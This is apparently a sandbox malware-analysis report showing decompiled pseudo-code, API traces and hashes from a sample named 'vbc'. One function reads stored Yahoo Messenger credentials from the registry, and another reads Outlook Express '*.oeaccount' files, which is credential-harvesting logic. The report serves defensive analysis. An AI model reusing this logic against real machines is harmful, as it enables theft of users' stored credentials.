                                                                                                                                                                        • Opcode ID: fec04840c498abd3992574a7e604aaddea038dd89c6a73b46c7ff5499d0b65e7
                                                                                                                                                                        • Instruction ID: a1e53a31d12307489e3dcdfde72dead8da93f466afb76ebe56892d48a8bd1a3f
                                                                                                                                                                        • Opcode Fuzzy Hash: fec04840c498abd3992574a7e604aaddea038dd89c6a73b46c7ff5499d0b65e7
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A21D676A041096EDB10AF699D81ADE7F6C9F00309F1440BBEA04F3181DB789B86866D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00411622 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00411622(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void _v1031;
				char _v1032;
				void* __esi;
				void* _t25;
				int _t26;

				_t25 = __ecx;
				_t26 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				if(E0040F1B0(0x80000001, "Software\\Yahoo\\Pager",  &_v8) == 0) {
					if(E0040F1F1(0x3ff, _t25, _v8, "Yahoo! User ID", _a4) == 0 && E0040F1F1(0x3ff, _t25, _v8, "EOptions string",  &_v1032) == 0) {
						_t26 = E0041194A(_t25, _a8, _a4,  &_v1032);
					}
					RegCloseKey(_v8);
				}
				return _t26;
			}









                                                                                                                                                                        0x00411622
                                                                                                                                                                        0x00411633
                                                                                                                                                                        0x0041163d
                                                                                                                                                                        0x00411644
                                                                                                                                                                        0x00411661
                                                                                                                                                                        0x0041167a
                                                                                                                                                                        0x004116ab
                                                                                                                                                                        0x004116ab
                                                                                                                                                                        0x004116b0
                                                                                                                                                                        0x004116b0
                                                                                                                                                                        0x004116bb

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00411644
                                                                                                                                                                          • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                          • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004116B0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseOpenQueryValuememset
                                                                                                                                                                        • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                        • API String ID: 1830152886-1703613266
                                                                                                                                                                        • Opcode ID: 3ec72928c88313449a069dffbaf2e341cc248c5522c4285b6e7c3985674fc6c1
                                                                                                                                                                        • Instruction ID: 516cda371f3396bdfc4173c93ac40c9cbeab8f1746814b3412c432ea0c8be721
                                                                                                                                                                        • Opcode Fuzzy Hash: 3ec72928c88313449a069dffbaf2e341cc248c5522c4285b6e7c3985674fc6c1
                                                                                                                                                                        • Instruction Fuzzy Hash: 8401C4B5A00018FBDB109A15CD01FDE7A6D9B90354F040072FF08F2221F2358F599A98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00405F4B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00405F4B(long __eax, struct HWND__* _a4) {
				char _v1028;
				char _v2052;
				void* __edi;
				long _t15;

				_t15 = __eax;
				if(__eax == 0) {
					_t15 = GetLastError();
				}
				E00405E50(_t15,  &_v1028);
				sprintf( &_v2052, "Error %d: %s", _t15,  &_v1028);
				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
			}







                                                                                                                                                                        0x00405f55
                                                                                                                                                                        0x00405f59
                                                                                                                                                                        0x00405f61
                                                                                                                                                                        0x00405f61
                                                                                                                                                                        0x00405f6a
                                                                                                                                                                        0x00405f83
                                                                                                                                                                        0x00405fa4

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLastMessagesprintf
                                                                                                                                                                        • String ID: Error$Error %d: %s
                                                                                                                                                                        • API String ID: 1670431679-1552265934
                                                                                                                                                                        • Opcode ID: 4911e26903d4482cbd9d642036671f993fd1af17c5afcfd040224a18a71cc317
                                                                                                                                                                        • Instruction ID: f1cbc3d381c34e383a1f44b31e9a73e3da945176662b790f0432ac9700464d50
                                                                                                                                                                        • Opcode Fuzzy Hash: 4911e26903d4482cbd9d642036671f993fd1af17c5afcfd040224a18a71cc317
                                                                                                                                                                        • Instruction Fuzzy Hash: 90F0A77680010977CB10AB64CC06FDB77BCAB44704F140076BB45E2140EA74DB458EA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F6A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                        			E0040F6A8(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;

				_t7 = 0;
				_t8 = LoadLibraryA("shlwapi.dll");
				_t3 = GetProcAddress(_t8, "SHAutoComplete");
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}






                                                                                                                                                                        0x0040f6af
                                                                                                                                                                        0x0040f6b7
                                                                                                                                                                        0x0040f6bf
                                                                                                                                                                        0x0040f6c7
                                                                                                                                                                        0x0040f6d4
                                                                                                                                                                        0x0040f6d4
                                                                                                                                                                        0x0040f6d7
                                                                                                                                                                        0x0040f6e1

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,745D48C0,00405C4B,00000000), ref: 0040F6B1
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F6BF
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0040F6D7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                        • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                        • API String ID: 145871493-1506664499
                                                                                                                                                                        • Opcode ID: 1745662a808ecc52a60ee12c912701a8b94b5af88e17989fb7bf14a85f6732ea
                                                                                                                                                                        • Instruction ID: ed3b1cda8c3177e5f4c950405da88c53b72577223da9c459121c2a3053d1176f
                                                                                                                                                                        • Opcode Fuzzy Hash: 1745662a808ecc52a60ee12c912701a8b94b5af88e17989fb7bf14a85f6732ea
                                                                                                                                                                        • Instruction Fuzzy Hash: 5AD02B313002106BDA305F21BC09EEF3DEDEFC47937018032F800D2164DB258D0281AC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00409808 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                        			E00409808(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v259;
				char _v260;
				signed int _t34;
				char* _t45;
				void* _t47;

				E00405F07(_a4, "<item>\r\n");
				_t34 = 0;
				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						E0040F70E( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
						_t45 =  &_v260;
						E0040918B(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
						sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
						E00405F07(_a4,  *(__edi + 0x54));
						_t47 = _t47 + 0x28;
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
				}
				return E00405F07(_a4, "</item>\r\n");
			}








                                                                                                                                                                        0x0040981a
                                                                                                                                                                        0x0040981f
                                                                                                                                                                        0x00409826
                                                                                                                                                                        0x00409829
                                                                                                                                                                        0x00409837
                                                                                                                                                                        0x0040983e
                                                                                                                                                                        0x0040985a
                                                                                                                                                                        0x00409869
                                                                                                                                                                        0x0040986f
                                                                                                                                                                        0x00409883
                                                                                                                                                                        0x0040988e
                                                                                                                                                                        0x00409893
                                                                                                                                                                        0x00409896
                                                                                                                                                                        0x00409897
                                                                                                                                                                        0x0040989c
                                                                                                                                                                        0x004098ae

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                          • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,73B74DE0,00000000,?,?,00409460,00000001,00413B1C,73B74DE0), ref: 00405F21
                                                                                                                                                                        • memset.MSVCRT ref: 0040983E
                                                                                                                                                                          • Part of subcall function 0040F70E: memcpy.MSVCRT ref: 0040F77C
                                                                                                                                                                          • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
                                                                                                                                                                          • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
                                                                                                                                                                        • sprintf.MSVCRT ref: 00409883
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                                                                                                                                                                        • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                        • API String ID: 3200591283-2769808009
                                                                                                                                                                        • Opcode ID: ef506932c8d52d72789fba1ffefffec390692f9936b3c03bbb8efc2406efdbf0
                                                                                                                                                                        • Instruction ID: 22b2cf82475c3b06c8668363684e5b6771b4bc8edfe41877af386eb7fddec59d
                                                                                                                                                                        • Opcode Fuzzy Hash: ef506932c8d52d72789fba1ffefffec390692f9936b3c03bbb8efc2406efdbf0
                                                                                                                                                                        • Instruction Fuzzy Hash: 4B11A331600616BFDB11AF15CC42E967B64FF0831CF10017AF909666A2D77ABDA4DF98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00411270 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                        			E00411270(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _t12;
				void* _t15;
				char* _t19;
				void* _t25;
				void* _t28;
				long _t31;

				_t12 = E00405ED5(_a8);
				_a8 = _t12;
				if(_t12 != 0xffffffff) {
					_t31 = GetFileSize(_t12, 0);
					_t37 = _t31 - 2;
					if(_t31 > 2) {
						_t3 = _t31 + 2; // 0x2
						_t15 = _t3;
						L00412090();
						_t25 = _t15;
						_t28 = _t15;
						SetFilePointer(_a8, 2, 0, 0);
						_t5 = _t31 - 2; // -2
						E00406725(_t25, _a8, _t28, _t5);
						_t19 = _t28 + _t31;
						 *((char*)(_t19 - 2)) = 0;
						 *((char*)(_t19 - 1)) = 0;
						 *_t19 = 0;
						E00411133(_t25, _t37, _a4, _t28);
						_push(_t28);
						L00412096();
					}
					return CloseHandle(_a8);
				}
				return _t12;
			}









                                                                                                                                                                        0x00411276
                                                                                                                                                                        0x0041127f
                                                                                                                                                                        0x00411282
                                                                                                                                                                        0x00411290
                                                                                                                                                                        0x00411292
                                                                                                                                                                        0x00411295
                                                                                                                                                                        0x00411297
                                                                                                                                                                        0x00411297
                                                                                                                                                                        0x0041129c
                                                                                                                                                                        0x004112a1
                                                                                                                                                                        0x004112a9
                                                                                                                                                                        0x004112ab
                                                                                                                                                                        0x004112b1
                                                                                                                                                                        0x004112b9
                                                                                                                                                                        0x004112c1
                                                                                                                                                                        0x004112c8
                                                                                                                                                                        0x004112cb
                                                                                                                                                                        0x004112ce
                                                                                                                                                                        0x004112d0
                                                                                                                                                                        0x004112d5
                                                                                                                                                                        0x004112d6
                                                                                                                                                                        0x004112dc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004112e7
                                                                                                                                                                        0x004112e9

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 0041128A
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0041129C
                                                                                                                                                                        • SetFilePointer.KERNEL32(0041141B,00000002,00000000,00000000,?,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 004112AB
                                                                                                                                                                          • Part of subcall function 00406725: ReadFile.KERNEL32(?,0041141B,?,00000000,00000000,?,?,004112BE,0041141B,00000000,-00000002,?,0041133F,?,?,*.oeaccount), ref: 0040673C
                                                                                                                                                                          • Part of subcall function 00411133: wcslen.MSVCRT ref: 00411146
                                                                                                                                                                          • Part of subcall function 00411133: ??2@YAPAXI@Z.MSVCRT ref: 0041114F
                                                                                                                                                                          • Part of subcall function 00411133: WideCharToMultiByte.KERNEL32(00000000,00000000,004112D5,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004112D5,?,00000000,0041141B), ref: 00411168
                                                                                                                                                                          • Part of subcall function 00411133: strlen.MSVCRT ref: 004111AB
                                                                                                                                                                          • Part of subcall function 00411133: memcpy.MSVCRT ref: 004111C5
                                                                                                                                                                          • Part of subcall function 00411133: ??3@YAXPAX@Z.MSVCRT ref: 00411258
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004112D6
                                                                                                                                                                        • CloseHandle.KERNEL32(0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?,00000104), ref: 004112E0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1886237854-0
                                                                                                                                                                        • Opcode ID: ad22d69f7345f3b24d8de157050b13a83eeb7d85e4f68c574eabfa488dcb2246
                                                                                                                                                                        • Instruction ID: e21230228d1277bb6eddc604f6d9b170c83676d8100b74bfcef0317b0316c018
                                                                                                                                                                        • Opcode Fuzzy Hash: ad22d69f7345f3b24d8de157050b13a83eeb7d85e4f68c574eabfa488dcb2246
                                                                                                                                                                        • Instruction Fuzzy Hash: BA01B532404248BEDB106F75EC4DDDBBFACEF59368710816BF958C62A0DA358D54CB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00407D63 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00407D63(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E0040658F(_t30);
				}
				return 1;
			}









                                                                                                                                                                        0x00407d6e
                                                                                                                                                                        0x00407d71
                                                                                                                                                                        0x00407d7b
                                                                                                                                                                        0x00407d82
                                                                                                                                                                        0x00407d8d
                                                                                                                                                                        0x00407d9d
                                                                                                                                                                        0x00407dab
                                                                                                                                                                        0x00407db3
                                                                                                                                                                        0x00407db9
                                                                                                                                                                        0x00407dbf
                                                                                                                                                                        0x00407dc4
                                                                                                                                                                        0x00407dc7
                                                                                                                                                                        0x00407dcc
                                                                                                                                                                        0x00407dd2

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetParent.USER32(?), ref: 00407D75
                                                                                                                                                                        • GetWindowRect.USER32 ref: 00407D82
                                                                                                                                                                        • GetClientRect.USER32 ref: 00407D8D
                                                                                                                                                                        • MapWindowPoints.USER32 ref: 00407D9D
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407DB9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4247780290-0
                                                                                                                                                                        • Opcode ID: 37609a960450173bf69824f7e52b241be5bc0a1fab6fa9040fc85c24cae36fff
                                                                                                                                                                        • Instruction ID: 038819a919944698b8d7aadaf115a7119d50e81e4b6eee93b7f6b8021a4f8f43
                                                                                                                                                                        • Opcode Fuzzy Hash: 37609a960450173bf69824f7e52b241be5bc0a1fab6fa9040fc85c24cae36fff
                                                                                                                                                                        • Instruction Fuzzy Hash: F7015A32801129BBDB11AFA59C49EFFBFBCEF46751F04812AFD05A2140D738A605CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004099DA Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E004099DA(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				char* _t28;

				_t26 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				E00405F07(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
				_t28 =  &_v260;
				E0040918B(_t28, _t17);
				sprintf( &_v516, "<%s>\r\n", _t28);
				return E00405F07(_a4,  &_v516);
			}











                                                                                                                                                                        0x004099f4
                                                                                                                                                                        0x004099f6
                                                                                                                                                                        0x004099fd
                                                                                                                                                                        0x00409a0c
                                                                                                                                                                        0x00409a13
                                                                                                                                                                        0x00409a20
                                                                                                                                                                        0x00409a2c
                                                                                                                                                                        0x00409a30
                                                                                                                                                                        0x00409a36
                                                                                                                                                                        0x00409a4a
                                                                                                                                                                        0x00409a64

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004099FD
                                                                                                                                                                        • memset.MSVCRT ref: 00409A13
                                                                                                                                                                          • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                          • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,73B74DE0,00000000,?,?,00409460,00000001,00413B1C,73B74DE0), ref: 00405F21
                                                                                                                                                                          • Part of subcall function 0040918B: strcpy.MSVCRT(00000000,?,00409874,?,?,?), ref: 00409190
                                                                                                                                                                          • Part of subcall function 0040918B: _strlwr.MSVCRT ref: 004091D3
                                                                                                                                                                        • sprintf.MSVCRT ref: 00409A4A
                                                                                                                                                                        Strings
                                                                                                                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00409A18
                                                                                                                                                                        • <%s>, xrefs: 00409A44
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                                                                                                        • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                        • API String ID: 3202206310-1998499579
                                                                                                                                                                        • Opcode ID: 8832b5a78768cb6b45b9e86c8935bb2a9e75a3943d9c8cceaada708264de42f7
                                                                                                                                                                        • Instruction ID: e71924cd66665c82b0e0cf5586ba0e292e849e53f6e9b6834f4978a1b65f22f6
                                                                                                                                                                        • Opcode Fuzzy Hash: 8832b5a78768cb6b45b9e86c8935bb2a9e75a3943d9c8cceaada708264de42f7
                                                                                                                                                                        • Instruction Fuzzy Hash: B601A7B2A001296AD720A655DC45FDB7A6C9F54704F0400FAB609F7182D7B8AA94CBA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040A632 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040A632(void* __eax) {
				void* __esi;
				void* _t36;

				_t36 = __eax;
				SendMessageA( *( *((intOrPtr*)(__eax + 0x370)) + 0x184), 0xb, 0, 0);
				E00405E36();
				 *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x370)) + 0x28)) = 0;
				SendMessageA( *( *((intOrPtr*)(_t36 + 0x370)) + 0x184), 0x1009, 0, 0);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x370)))) + 0x5c))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x370)))) + 0x74))(1);
				E0040A5A1(_t36);
				SetCursor( *0x417b98);
				SetFocus( *( *((intOrPtr*)(_t36 + 0x370)) + 0x184));
				return SendMessageA( *( *((intOrPtr*)(_t36 + 0x370)) + 0x184), 0xb, 1, 0);
			}





                                                                                                                                                                        0x0040a63f
                                                                                                                                                                        0x0040a64f
                                                                                                                                                                        0x0040a651
                                                                                                                                                                        0x0040a65e
                                                                                                                                                                        0x0040a672
                                                                                                                                                                        0x0040a67c
                                                                                                                                                                        0x0040a689
                                                                                                                                                                        0x0040a68c
                                                                                                                                                                        0x0040a697
                                                                                                                                                                        0x0040a6a9
                                                                                                                                                                        0x0040a6c5

                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040A64F
                                                                                                                                                                          • Part of subcall function 00405E36: LoadCursorA.USER32 ref: 00405E3D
                                                                                                                                                                          • Part of subcall function 00405E36: SetCursor.USER32(00000000,?,0040BCA6), ref: 00405E44
                                                                                                                                                                        • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040A672
                                                                                                                                                                          • Part of subcall function 0040A5A1: sprintf.MSVCRT ref: 0040A5C7
                                                                                                                                                                          • Part of subcall function 0040A5A1: sprintf.MSVCRT ref: 0040A5F1
                                                                                                                                                                          • Part of subcall function 0040A5A1: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A604
                                                                                                                                                                          • Part of subcall function 0040A5A1: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A62A
                                                                                                                                                                        • SetCursor.USER32(?,?,0040B7F8), ref: 0040A697
                                                                                                                                                                        • SetFocus.USER32(?,?,?,0040B7F8), ref: 0040A6A9
                                                                                                                                                                        • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040A6C0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2210206837-0
                                                                                                                                                                        • Opcode ID: c4500f01a9179d05fffa9e4a2d537714384da649f00e33917d281301b44e2473
                                                                                                                                                                        • Instruction ID: 509cc9229267159212bead5259dcc336d8983f4e7fdf05ffa4c6fe4d4677fdd3
                                                                                                                                                                        • Opcode Fuzzy Hash: c4500f01a9179d05fffa9e4a2d537714384da649f00e33917d281301b44e2473
                                                                                                                                                                        • Instruction Fuzzy Hash: C601E9B1244604EFD326AB75CD89FA6B7E9FF48305F0544B9F15D9B271CA716E018B10
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004086DC Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                        			E004086DC(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x24));
				if(_t9 != 0) {
					_push(_t9);
					L00412096();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x34));
				if(_t10 != 0) {
					_push(_t10);
					L00412096();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
				if(_t11 != 0) {
					_push(_t11);
					L00412096();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L00412096();
						 *_t18 = 0;
					}
					_push(_t18);
					L00412096();
				}
				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
				 *((intOrPtr*)(_t19 + 0x24)) = 0;
				 *((intOrPtr*)(_t19 + 0x34)) = 0;
				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
				return _t11;
			}








                                                                                                                                                                        0x004086dc
                                                                                                                                                                        0x004086dc
                                                                                                                                                                        0x004086e5
                                                                                                                                                                        0x004086e7
                                                                                                                                                                        0x004086e8
                                                                                                                                                                        0x004086ed
                                                                                                                                                                        0x004086ee
                                                                                                                                                                        0x004086f3
                                                                                                                                                                        0x004086f5
                                                                                                                                                                        0x004086f6
                                                                                                                                                                        0x004086fb
                                                                                                                                                                        0x004086fc
                                                                                                                                                                        0x00408704
                                                                                                                                                                        0x00408706
                                                                                                                                                                        0x00408707
                                                                                                                                                                        0x0040870c
